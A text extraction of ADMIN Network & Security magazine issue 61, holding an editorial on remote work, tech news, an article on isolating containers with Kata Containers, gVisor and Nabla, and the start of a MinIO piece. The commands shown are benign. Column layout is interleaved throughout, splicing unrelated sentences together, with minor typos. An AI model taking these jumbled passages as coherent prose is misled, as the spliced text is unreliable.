0% found this document useful (0 votes)
319 views102 pages

Work - And.security - Issue.61 January - February.2021

Uploaded by

Florin Stratulat
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
319 views102 pages

Work - And.security - Issue.61 January - February.2021

Uploaded by

Florin Stratulat
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Lock Down

FREE
DVD Microsoft IIS Secure Containers

ADMIN
ADMIN
Network & Security

Network & Security


ISSUE 61

Secure Containers
with a hypervisor DMZ
CYBERSECURITY
Machine learning defends
the IT infrastructure

4 Password Managers
Safe Containers
Automate updates of
container components
MinIO
Local object store with
an S3 interface
Pulumi
Multicloud orchestrator
Tarpits Apache Kafka New features
Slow down attackers Better stream processing in PHP 8
Keycloak Teler
In-house single Analyze logs and identify
sign-on server suspicious activity in real time

WWW.ADMIN-MAGAZINE.COM
Welcome to ADMIN W E LCO M E

Upheaval
2021: The year of job and location change

Well, 2020 was certainly a wild ride wasn’t it? I hope you, your family, and your circle of friends are all safe,
employed, and healthy. Even if you are employed, I’m predicting that 2021 will be a year of change for a lot of
you and for myself. One significant thing that 2020 taught is that we can work from anywhere. Remote work
is possible and should be embraced as the next phase of system administration career mobility.
If you’ve worked as a system administrator for any length of time, you realize that a well-defined career ladder
doesn’t really exist. I hope that statement didn’t come as a shocking surprise to you. Many of the sys admin jobs
I’ve held over the past 20+ years don’t even have a job description attached to them. I can’t count the number
of job descriptions I’ve written for myself and other sys admins, only to realize that it was a purely administra-
tive effort. In other words, no one will ever read, refer to, or access the descriptions except to see that they exist.
Such is the life of a sys admin. I don’t mean to depress you or bemoan a good career choice. My purpose is to let
you know that there is hope on the horizon.
Some of us have known for years that remote work is possible and that it’s also a valuable asset for employers.
Personally, I started working from home two days per week in 2001. My employer at the time insisted that we
work remotely so that we could become more mobile and so that the company could possibly downsize their real
estate footprint. It worked. Some companies still haven’t caught on to the 20-year-old trend of remote work.
The biggest problem with remote work is discipline. Some people don’t have the discipline to do it well. It takes
getting used to. Really the only differences between remote work and going to an office are the commute and
your proximity to other people. I find little value in either. I love working at home, from a hotel room, or from
the comfort of a rented condo at the beach. I’m not sure there’s any real advantage to going into an office on
a regular basis. Let me put it plainly: If your employer doesn’t see the value of remote work
and you have the technology to allow it, then you should seek employment else-
where. That’s what I did. My previous employer didn’t want anyone in IT to
work remotely, even though we had the capability. I got busy and found
an employer that operates in the 21st century.
I’ve heard all the arguments on both sides of the topic and
none convince me that going into an office should be a re-
quirement for those of us who (1) don’t need to interact di-
rectly with other people (users or customers), (2) are just as
efficient from a remote location, and (3) work hours outside
of 8:00am to 5:00pm. I like to work remotely. I have fewer
distractions at home, which I understand is not the case for
everyone, but it works for me. I also don’t always want to
work regular office hours. My most efficient work times
are early in the morning and then in the evenings. I still log
more than the customary eight hours per day, so my em-
ployer should never feel slighted or overcharged. For me,
remote work is the best benefit I could request, and it’s
the most valued of any perk I’ve received.
Frankly, I stayed at one job for 16 years because of a
remote work option. When they brought us back into
an office, I found a different job – one that was remote
friendly. My next job was not remote friendly. I didn’t stay
Lead Image © Maksym Yemelyanov, 123RF.com

long. I’m now at a very remote-friendly company, and I’m


happy. I’m also relocating to the East Coast from the Midwest,
which also makes me happy.
I suggest that you evaluate what you want from your career and your life. If physical mobility is what you’re af-
ter, then find a position that allows it. If career mobility is your goal, you might have to reconsider your selection
of a job in IT. For me, 2021 is going to be a year of transitions – transitions away from things, people, and places
that I don’t like to those I do.
Ken Hess • ADMIN Senior Editor

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 3
S E RV I C E Table of Contents

ADMIN Network & Security

Features News Containers and Virtualization

Security is the watchword this issue, Find out about the latest ploys and Virtual environments are becoming
and we begin with eliminating toys in the world of information faster, more secure, and easier to set
container security concerns. technology. up and use. Check out these tools.

10 Container Security with a DMZ 8 News 42 Pulumi


Container technology security is • Native edge computing comes to A unified interface and surface for
not well defined. We look at several Red Hat Enterprise Linux orchestrating various clouds and
approaches to closing this security • IBM/Red Hat deals crushing blow Kubernetes.
gap with hypervisors and buffer zones. to CentOS
• Linux Kernel 5.10 is ready for 48 Build Secure Containers
release 48 The basic container images on which you
• Canonical launches curated base your work can often be out of date.
container images We show you how to solve this problem
and create significantly leaner containers.

Tools Security

Save time and simplify your workday 26 PHP 8 Use these powerful security tools
with these useful tools for real-world Version 8 of the popular PHP scripting to protect your network and keep
systems administration. language comes with a number of intruders in the cold.
innovations and ditches some obsolete
16 MinIO features. 52 Secure Login with FIDO2
This fast high-performance object The FIDO and FIDO2 standards support
storage server has a world-class S3 passwordless authentication.
interface, with features even the
original lacks 58 Cybersecurity and ML
Machine learning can address risks
30 Timeout in a Tarpit and help defend the IT infrastructure
Consume an attacker's resources or by strengthening and simplifying
direct them to a throttled SSH server. cybersecurity.

34 Apache Kafka
Apache Kafka continuously captures,
processes, stores, and integrates data,
almost in real time.
22 OpenIAM
Identity and access management
plays a central role in modern 64 Keycloak
IT infrastructures. Discover how Run an on-premises single sign-on
OpenIAM implements centralized user service with the option of integrating
management. existing Kerberos or LDAP accounts.

4 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Table of Contents S E RV I C E

58 Cybersecurity and ML
30 Timeout in a Tarpit Deep learning excels at feature
Keep an attacker’s connections open extraction, which makes machine
in an Endlessh “tarpit” or delay learning algorithms interesting for
incoming connections with the rate- cybersecurity tasks.
limiting tc.

Management Nuts and Bolts

Use these practical apps to extend, Timely tutorials on fundamental


simplify, and automate routine admin techniques for systems
tasks. administrators.

66 Auto Install with PXE 76 Password Managers


Automate CentOS and RHEL installation Four password managers that can
Live 2.7.0
in a preboot execution environment. help you keep track of all your access Supports:
credentials.
l Many filesystems
l MBR and GPT partition
formats
l Unattended mode
84 Parallel Performance
Why the wall clock time of your l Restoring one image to
parallelized applications do not improve
72 Teler when adding cores. many local devices
This intrusion detection and threat
alert tool analyzes logs and identifies
l ecryptfs
suspicious activity in real time.

88 Managing Microsoft IIS


Manage Microsoft IIS with on-board
tools, including the well-known Internet
Information Services (IIS) Manager,
Windows Admin Center, and PowerShell.

Service
3 Welcome
4 Table of Contents
94 Performance Tuning Dojo
6 On the DVD
We examine some mathemagical tools
97 Back Issues
that approximate time-to-execute given
98 Call for Papers
the parallelizable segment of code. See p 6 for details
W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 5
S E RV I C E On the DVD

Clonezilla 2.7.0-10 (Live)

On the DVD
Clonezilla is a partition and disk imaging/cloning pro-
gram suitable for single-machine backup and restore.
The Linux kernel has been updated to 5.9.1-1. Clonezilla
Live supports:
n Many filesystems
n MBR and GPT partition formats
n Unattended mode
n Restoring one image to many local devices
n eCryptfs

Resources

[1] Clonezilla: [https://clonezilla.org]


[2] About: [https://clonezilla.org/clonezilla‑live.php]
DEFECTIVE DVD? [3] 2.7.0‑10 release: [https://sourceforge.net/p/clonezilla/news/]
Defective discs will be replaced, email: [email protected]
[4] FAQs: [https://drbl.org/faq/]
While this ADMIN magazine disc has been tested and is to the best of our
knowledge free of malicious software and defects, ADMIN magazine cannot [5] Downloads:
be held responsible and is not liable for any disruption, loss, or damage to [https://clonezilla.org/downloads/download.php?branch=stable]
data and computer systems related to the use of this disc.

6 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
NEWS ADMIN News

News for Admins

Tech News
Native Edge Computing Comes to Red Hat Enterprise Linux
With the latest release of Red Hat Enterprise Linux (RHEL) and OpenShift, it has become even
easier for businesses to add edge deployment to existing infrastructure.
With this release, Red Hat has attempted to refine the definitions of Edge computing. To this,
Nicolas Barcet, Red Hat Senior Directory Technology Strategy, says “Edge is not just one thing,
it’s multiple things, multiple layers.” Barcet continues, “A single customer use case may have
up to five layers of edge-related infrastructure, going from the IoT device all the way to the ag-
gregation data centers.” Barcet concludes with, “What we need to offer as a software infrastruc-
ture provider is all the components to build according to the topology that
the customer wants for that use case.”
To address those components, Red Hat identified three basic edge
architectures:

• Far edge – single server locations with limited connectivity


• Closer edge – factory, branch, or remote store with reliable con-
nectivity and multiple servers
• Central edge – a regional data center that can control far and closer
edge infrastructures

RHEL 8.3 (released in November) includes tools like Image Builder, to ad-
dress building custom images (based on RHEL) for the Far Edge, worker nodes for the Closer Edge,
and OpenShift with an added management layer for the Central Edge. But the most important
feature found in RHEL 8.3 is the Red Hat Advanced Cluster Management tool, which provides the
ability to manage a fleet of OpenShift clusters.
For more information about RHEL 8.3, read the official release notes (https://access.redhat.com/docu-
mentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/index).

IBM/Red Hat Deals Crushing Blow to CentOS


In a move that can be best summed up with a gaping mouth, IBM/Red Hat has announced it is
ending CentOS 8 and shifting all releases of the server operating system to the Stream edition.
Get the latest What is CentOS Stream, you ask? It’s a rolling release edition of the popular server platform.
IT and HPC news What is a rolling release? Instead of the traditional yearly major and minor releases, rolling releases
Lead Image © vlastas, 123RF.com

in your inbox are continuously updated, so all software (from the kernel to the userspace software) is always up
to date.
Subscribe free to For many, this means instability can be introduced to the system. For an operating system known
ADMIN Update for its rock-solid stability, the shift to a rolling release could mean disaster.
and HPC Update But it’s not just the update process that has many a Linux admin up in arms. To date, Cen-
bit.ly/HPC-ADMIN-Update tOS has been downstream of RHEL, which meant it included most of the features added to the

8 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
ADMIN News NEWS

enterprise-grade operating system. CentOS Stream, however, will be downstream of Fedora, so


it will not benefit from anything added to RHEL.
CentOS 8 admins will have until some point in 2021 to decide if they want to continue on with
CentOS Stream or find another platform.
To read more on this, check out Red Hat’s official take on the shift (https://www.redhat.com/en/blog/
centos-stream-building-innovative-future-enterprise-linux).

Linux Kernel 5.10 Is Ready for Release


For a while, Linus Torvalds was concerned about the size of changes for the Linux 5.10 release.
However, with the release of the rc6 candidate, that worry has subsided. To this point, Torvalds
said, “...at least this week isn’t unusually bigger than normal – it’s a pretty
normal rc6 stat-wise. So unless we have some big surprising left-overs
coming up, I think we’re in good shape.”
Torvalds continued to say, “That vidtv driver shows up very clearly in the
patch stats too, but other than that it all looks very normal: mostly driver
updates (even ignoring the vidtv ones), with the usual smattering of small
fixes elsewhere – architecture code, networking, some filesystem stuff."
As far as what’s to be expected in the kernel, there are two issues that
have been around for some time that are finally being either given the boot
or improved.
The first is the removal of the set_fs() feature, which checks whether
a copy of the user space actually goes to either the user space or to the
kernel. Back in 2010, it was discovered that this feature could be used to
overwrite and give permission to arbitrary kernel memory allocations. The
bug was fixed, but the feature remained. Since then, however, manufac-
turers improved the management of memory so that on most architecture
memory space overloads have been banned.
Another improvement is the continued work to address the 2038 issue
(a bug that has been known for some time regarding time encoding). On © Golkin Oleg, 123RF.com
POSIX systems, time is calculated based on seconds elapsed since Janu-
ary 1, 1970. As more time passes, the number to represent a date increases. By the year 2038, it is
believed 32-bit systems will no longer function. As of the 5.6 release, those systems could pass the
year 2038. The 5.10 release improves on that reliability.
Released in mid-December 2020, Linux Kernel 5.10 offers filesystem and storage optimiza-
tions, as well as support for even more hardware.
For more information on the release, check out this message (https://lwn.net/Articles/838514/) from
Linus himself.

Canonical Launches Curated Container Images


Any admin that has deployed containers understands how important security is for business. The
problem with containers is that it’s often hard to know if an image is safe to use, especially when
you’re pulling random images from the likes of Docker Hub. You never know if you’re going to pull
down an image that contains vulnerabilities or malware.
That’s why Canonical has decided to publish the long-term support (LTS) Docker Image Portfolio
to Docker Hub. This portfolio comes with up to 10 years of Extended Security Maintenance from
Canonical. In response, Mark Lewis, Canonical VP of Application Services, has stated, “LTS Images
are built on trusted infrastructure, in a secure environment, with guarantees of stable security up-
dates.” Lewis continued, “They offer a new level of container provenance and assurance to organi-
zations making the shift to container based operations.”
This means that Canonical has joined Docker Hub as a Docker Verified Publisher to ensure that
hardened Ubuntu images will be available for software supply chains and multicloud development.
For anyone looking to download images, they can be viewed on the official Ubuntu Docker page
(https://hub.docker.com/_/ubuntu) or pulled with a command like docker pull ubuntu.
For more information about this joint venture, check out the official Docker announcement
(https://www.docker.com/blog/canonical-joins-docker-verified-publisher-program/).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 9
F E AT U R E S Container Security with a DMZ

Secure containers with a hypervisor DMZ

Buffer Zone
Container technology security is not well defined. We look at several approaches to closing this security gap
with hypervisors and buffer zones. By Udo Seidel
Containers have become an almost concerns. The considerations are villain is thus in an environment
omnipresent component in modern limited to Linux as the underlying op- that has comprehensive, far-reaching
IT. The associated ecosystem is grow- erating system, but this is not a real rights. Additionally, one kernel
ing and making both application and restriction, because the container eco- usually serves several container
integration ever easier. For some, system on Linux is more diverse than instances. In case of a successful at-
containers are the next evolutionary on its competitors. tack, everyone is at risk.
step in virtual machines: They launch The obvious countermeasure is to
faster, are more flexible, and make How Secure? prevent such an outbreak, but that is
better use of available resources. easier said than done. The year 2019
One question remains unanswered: Only the specifics of container secu- alone saw two serious security vul-
Are containers as secure as virtual rity are investigated here. Exploiting nerabilities [1] [2]. Fortunately, this
machines? In this article, I first briefly an SQL vulnerability in a database or was not the case in 2020. However,
describe the current status quo. After- a vulnerability in a web server is not this tranquility might be deceptive:
ward, I provide insight into different considered. Classic virtual machines The operating system kernel is a com-
approaches of eliminating security serve as the measure of all things. plex construct with many system calls
The question is: Do containers of- and internal communication chan-
fer the same kind of security? More nels. Experience shows that undesir-
precisely: Do containers offer com- able side effects or even errors occur
parable or even superior isolation of time and again. Sometimes these re-
individual instances from each other? main undiscovered for years. Is there
How vulnerable is the host to attack no way to improve container security?
by the services running on it? Is trusting the hard work of the devel-
A short review of the basic functional- oper community the only way?
ity of containers is essential (Figure 1).
Control groups and namespaces pro- New Approach: Buffer Zone
vided by the operating system kernel
serve as fundamental components, The scenario just described is based
along with some processes and access on a certain assumption or way of
Lead Image © lightwise, 123RF.com

permissions assigned by the kernel. thinking: It is important to prevent


One major security challenge with breakouts from the container in-
containers immediately becomes stance, although this is only one
apparent: A user who manages to possible aspect of container security.
break out of an instance goes directly Avoiding breakouts protects the un-
Figure 1: Simplified schematic structure of to the operating system kernel – or derlying operating system kernel. Is
containers. at least dangerously close to it. The there another way to achieve this? Is

10 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Container Security with a DMZ F E AT U R E S

difference is how “thick” or “exten- process number two, the Kata agent,
sive” it is. takes over, running as a normal pro-
cess within the virtual instance. In
Kata Containers the standard installation, this role is
handled by a lean operating system
The first approach borrows heavily from by Intel named Clear Linux [10],
classical virtualization with a hypervi- which gives the kernel of the underly-
sor. One prominent representative is ing operating system double protec-
the Kata Containers [4] project, which tion: through the kernel of the guest
has been active since 2017. Its sponsor operating system and through the
is the Open Infrastructure Foundation, virtualization layer.
which many probably still know as Another benefit is great compatibility.
the OpenStack Foundation [5]. In principle, any application that can
However, the roots of Kata Containers be virtualized should work; the same
go back further than 2017, and the can be said for existing container im-
project brings together efforts from ages. There were no surprises in the
Intel and the Hyper.sh secure con- laboratory tests. The use of known
tainer hosting service: Clear Contain- technologies also facilitates problem
ers [6] or runV [7]. Kata Containers analysis and troubleshooting.
Figure 2: A buffer zone secures the use a type II hypervisor with a lean
containers. Linux as the buffer zone (Figure 3). In Hypervisor Buffer
the first versions, a somewhat leaner
it possibly okay just to mitigate the version of Qemu [8] was used; newer
Disadvantages
damage after such an breakout? versions support the Firecracker [9] Increased security with extensive
This approach is not at all new in IT. microhypervisor by AWS. compatibility also comes at a price.
One well-known example comes from When this article was written, the On the one hand is the heavier
the field of networks, when securing Kata Containers project had just re- demand on hardware resources: A
a website with an application and da- leased a new version that reduced virtualization process has to run
tabase. A buffer zone, known as the the number of components needed. for each container instance. On the
demilitarized zone (DMZ) [3], has In Figure 3, you can see a proxy other hand, the underlying software
long been established here. The strat- process, which is completely missing requires maintenance and provides
egy can also be applied to containers from the current version. Moreover, an additional attack vector, which
(Figure 2). only a single shim process is now is why Kata Containers prevents
In the three following approaches running for all container instances. having a slimmed down version of
for this buffer zone, the essential The real highlight, however, is not Qemu. Speaking of maintenance,
the use of Qemu and the guest operating system also has
the like, but integra- to be up to date. At the very least,
tion with container critical bugs and vulnerabilities
management tools. need to be addressed.
In other words: All in all, increased container secu-
Starting, interacting rity results in a larger attack surface
with, and stopping on the host side and a significant
container instances increase in administrative overhead.
should work like To alleviate this problem, you could
conventional con- switch to microhypervisors, but again
tainers. The Kata the question of compatibility arises.
approach uses two Ultimately, your decision should de-
processes for this pend on the implementation of the
purpose. microhypervisor. To gain practical ex-
The first, Kata Shim, perience, you can run Kata Containers
is an extension of the with the Firecracker virtual machine
standardized shim manager (Listing 1) [11].
into the container
world. It is the part Behind the Scenes
of the bridge that
reaches into the vir- An installation of Kata Containers
Figure 3: The schematic structure of Kata Containers. tual machine. There, comprises a number of components

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 11
F E AT U R E S Container Security with a DMZ

Listing 1: Kata and Firecracker on one that is al- the range of functions can be reduced
ready running? accordingly – “only” containers have
$ docker run ‑‑runtime=kata‑fc ‑itd ‑‑name=kata‑fc busybox sh
If you’ve been to run. The gVisor kernel comprises
d78bde26f1d2c5dfc147cbb0489a54cf2e85094735f0f04cdf3ecba4826de8c9
around in the IT two components (Figure 4): Sentry
$ pstree|grep ‑e container ‑e kata
world for a few mimics the Linux substructure and
|‑containerd‑+‑containerd‑shim‑+‑firecracker‑‑‑2*[{firecracker}]
| |‑kata‑shim‑‑‑7*[{kata‑shim}]
years, you’re prob- intercepts the corresponding system
| | `‑10*[{containerd‑shim}] ably familiar with calls, and Gofer controls access to the
| `‑14*[{containerd}] user-mode Linux host system’s volumes.
$ (UML) [12]. The Attentive readers might wonder what
$ docker exec ‑it kata‑fc sh necessary adjust- exactly in this strategy might not
/ # ments have been work, and things did get off to a bit
/ # uname ‑r part of the kernel of a bumpy start. Fans of the Postgres
5.4.32 for years, but initial database had some worries because
research shows that of a lack of support for the sync_file_
that can be roughly divided into two this project is pretty much in a niche range() system call [14]. By now, this
classes. First are the processes that of its own – not a good starting posi- is ancient history. Even inexperienced
run on the host system, such as Kata tion to enrich the container world. programmers can get an overview
Shim and the Kata hypervisor. In A second consideration might take of the supported system calls in the
older versions, a proxy was added. you to the kexec() system call. Its typ- gvisor/pkg/sentry/syscalls/linux/
Second are processes that run inside ical field of application is collecting linux64.go file, but you do not have
Kata Containers, starting with the data that has led to a failure of the to go into so much detail: The devel-
operating system within the hypervi- primary Linux kernel and has very oper website supplies a compatibility
sor and extending to the Kata agent little to do with executing containers, list [15].
and the application. In extreme cases, which run several times, at the same Gofer acts as a kind of proxy and
the user is thus confronted with more time, and for far longer. interacts with the other gVisor com-
than a handful of components that Whether UML or kexec() – without ponent, Sentry. If you want to know
need to be kept up to date and secure. extensive additional work – these more about it, you have to take a look
However, the typical application does projects cannot be used for increased at a fairly ancient protocol – 9P [16] –
not provide for more than three parts. container security. that has its origins in the late 1980s in
The processes and development cy- the legendary Bell Labs.
cles for the host operating system and gVisor
the application are independent of Shoulder Surfing gVisor
Kata Containers. The remaining com- Google has implemented in the gVi-
ponents can be managed as a com- sor [13] project a watered-down vari- If you compare Kata Containers
plete construct. In other words, popu- ant of starting a second kernel. Two and gVisor, the latter looks simpler.
lar Linux distributions come with major challenges arise in establish- Instead of multiple software compo-
software directories that support easy ing an additional operating system nents, you only need to manage a
installation, updating, and removal of kernel as a buffer zone The first is
components, including the hypervi- running one or even multiple addi-
sor, the guest core, the entire guest tional kernels. The second relates to
operating system, Kata Shim, and the transparent integration into the exist-
Kata agent. By the way, containers ing world of tools and methods for
can easily be operated Kata-style par- container management.
allel to conventional containers. The gVisor project, written in the
fairly modern Go programming lan-
Double Kernel Without guage, provides a pretty pragmatic
solution for these tasks. The software
Virtualization only pretends to be a genuine Linux
As already mentioned, the hypervi- kernel. The result is a normal execut-
sor approach just described has two able file that maps all the necessary
isolation layers – the guest operating functions of the operating system
system or its kernel and the virtual- kernel; the challenge of how to load,
ization itself. The question arises as or of multiple execution, is therefore
to whether this could be simplified. off the table.
How about using only one additional Imitating a Linux kernel is certainly
kernel as a buffer zone? Good idea, difficult, but not impossible. To mini-
but how do you start a Linux kernel mize the additional attack surface, Figure 4: The schematic structure of gVisor.

12 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Container Security with a DMZ F E AT U R E S

single executable file. The area of at- container technology. Listing 2 also Here you build the application and
tack from additional components on shows how gVisor can be installed and kernel completely from scratch,
the overall system is also smaller. On operated in parallel with other runtime and both are completely matched
the downside, compatibility requires environments. You only need to specify
additional overhead. Without any the path to the binary file and any nec- Listing 2: gVisor Kernel Buffer Zone
personal effort, users are dependent essary arguments. $ cat /etc/docker/daemon.json
on the work and commitment of the {
gVisor developers. "runtimes": {
Minimalists "oci": {
"path": "/usr/sbin/runc"
Secure Containers with Finally, a third approach adopts the
},
ideas of the first two and pushes
gVisor minimalism to the extreme. Again, a
"runsc": {
"path": "/usr/local/bin/runsc",
The first steps with gVisor are easy: kind of microhypervisor takes over "runtimeArgs": [
You only have to download and install the service, in addition to a super- "‑‑platform=ptrace",
a single binary file. One typical pitfall minimalistic operating system kernel, "‑‑strace"
(besides unsupported system calls) is which is an old acquaintance from ]
}
allowing for the version of the gVisor the family of unikernels.
}
kernel, version 4.4.0 by default. In the Unikernels have very different imple- }
world of open source software, how- mentations. For example, OSv [17]
ever, this is often little more than a still maintains a certain Linux com- $ uname ‑r
string – as it is here (Listing 2). patibility, although parallels to the 5.8.16‑300.fc33.x86_64
The version number is stored in the gVisor kernel presented here can be $ docker run ‑ti ‑‑runtime runsc busybox sh
gvisor/pkg/sentry/syscalls/linux/ seen. At the other end of the reus- / #
/ # uname ‑r
linux64.go file. Creating a customized ability spectrum is MirageOS, the
4.4.0
binary file is easy thanks to (traditional) godfather of Nabla containers [18]:
F E AT U R E S Container Security with a DMZ

to each other. As a result, you only and require significantly less in terms fewer obstacles in the user’s way,
have one executable file. In other of resources than the combination At the other end of the spectrum are
words, the application is the kernel of Clear Linux and Qemu Lite. Ad- Nabla containers. Either way, the
and vice versa. One layer below this ditionally, almost all system calls are idea of the buffer zone is as simple
is the microhypervisor, which spe- prohibited in Nabla containers. The as it is brilliant. Thanks to the differ-
cializes in the execution of uniker- software uses the kernel’s secure com- ent implementations, there should be
nels. It has little in common with its puting mode (seccomp) functions [23]. something to suit everyone’s taste. n
colleagues Firecracker, Nova [19], or Ultimately, the following system calls
Bareflank [20]. are available:
One implementation of this approach n read() Info
is Nabla containers. The roots of the n write() [1] Container breakout:
project lie in the IBM research labo- n exit_group() [http://seclists.org/oss‑sec/2019/q1/119]
ratories. Solo5 is used as the micro- n clock_gettime() [2] Docker vulnerability: [https://nvd.nist.
hypervisor. Originally it was only n ppoll() gov/vuln/detail/CVE‑2018‑15664]
intended as an extension of MirageOS n pwrite64() [3] DMZ: [https://en.wikipedia.org/wiki/
for KVM [21]. Today, it is a frame- n pread6() DMZ_(computing)]
work for executing various unikernel On the downside, unlike Kata Con- [4] Kata Containers:
implementations. Despite the prox- tainers or gVisor, existing container [http://katacontainers.io]
imity to MirageOS, Nabla containers images cannot be used directly with [5] OpenStack: [http://www.openstack.org/]
have developed a certain preference the Nabla approach, revealing a clear [6] Clear Containers: [http://github.com/
for rump kernels [22]. lack of compatibility. Tests conducted clearcontainers/runtime/wiki]
The schematic structure is shown in by the editorial team showed that the [7] runV: [http://github.com/hyperhq/runv]
Figure 5. The name “Nabla” derives migration overhead is huge, even for [8] Qemu: [http://www.qemu.org/]
from its structure. At the top is the small applications. [9] Firecracker:
micro-hypervisor with the unikernel, [http://firecracker‑microvm.github.io/]
the basis of which is the application. Where to Next? [10] Clear Linux: [http://clearlinux.org/]
The size of the components reflects [11] Kata Containers with Firecracker:
their importance on the business The container community takes [http://github.com/kata‑containers/
end, and the order corresponds to the the issue of security very seriously. documentation/wiki/Initial‑release‑of‑
structure of the technology stack. The In principle, there are two parallel Kata‑Containers‑with‑Firecracker‑support]
result is an upside-down triangle that streams: One deals with improving [12] User‑mode Linux:
is very similar to the nabla symbol the container software, and the other, [http://user‑mode‑linux.sourceforge.net/]
from vector analysis. as discussed in this article, deals with [13] gVisor: [http://gvisor.dev/]
A few advantages of Nabla contain- methods for establishing additional [14] gVisor problems: [http://github.com/
ers are obvious: As with the Kata outside lines of defense. The idea of google/gvisor/issues/88]
approach, the operating system core using a DMZ from the network sector [15] Compatibility list: [http://gvisor.dev/
and virtualization present two isola- is experiencing a renaissance. An ad- docs/user_guide/compatibility/]
tion layers that are greatly minimized ditional operating system kernel – and [16] 9P: [http://9p.cat‑v.org/]
sometimes even a [17] OSv: [http://osv.io/]
virtualization layer – [18] Nabla containers:
acts as a buffer zone [http://nabla‑containers.github.io/]
between the applica- [19] Nova: [http://hypervisor.org/]
tion and the host. [20] Bareflank:
Basic compatibility [http://github.com/Bareflank/MicroV]
with the known [21] KVM: [http://linux‑kvm.org/]
management tools [22] Rump kernels: [http://rumpkernel.org/]
for containers is [23] seccomp: [http://man7.org/linux/
a given; they can man‑pages/man2/seccomp.2.html]
even be operated
completely in paral- The Author
lel (see also List- Udo Seidel is a math physics teacher and has
ing 2). However, been a Linux fan since 1996. After completing
the reusability of his PhD, he worked as a Linux/Unix trainer,
existing applications system administrator, senior solution engineer,
and container im- and Linux strategist. Today he is employed as
ages differs widely. an IT architect and evangelist by Amadeus Data
Figure 5: The schematic structure of Nabla containers. Kata Containers put Processing GmbH in Erding, Germany.

14 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
TO O L S MinIO

MinIO: Amazon S3 competition

Premium Storage
MinIO promises no less than a local object store with a world-class S3 What looks simple and clear-cut from
interface and features that even the original lacks. By Martin Loschwitz the outside comprises several layers
under the hood. You can’t see them
because MinIO comes as a single big
The Amazon Simple Storage Service investigate the product. How does it Go binary, but it makes sense to dig
(S3) protocol has had astonishing de- work under the hood? What functions down into the individual layers.
velopment in recent years. Originally, does it offer? How does it position it-
Amazon regarded the tool merely as self compared with similar solutions? Three Layers
a means to store arbitrary files online What does Amazon have to say?
with a standardized protocol, but Internally, MinIO is defined as an ar-
today, S3 plays an important role in How MinIO Works bitrary number of nodes with MinIO
the Amazon tool world as a central services that are divided into three
service. Little wonder that many MinIO is available under the free layers. The lowest layer is the storage
look-alikes have cropped up. Ceph, Apache license. You can download layer. Even an object store needs ac-
the free object store, for example, has the product directly from the ven- cess to physical disk space. Of course,
offered a free alternative for years dor’s GitHub directory [2]. MinIO is MinIO needs block storage devices
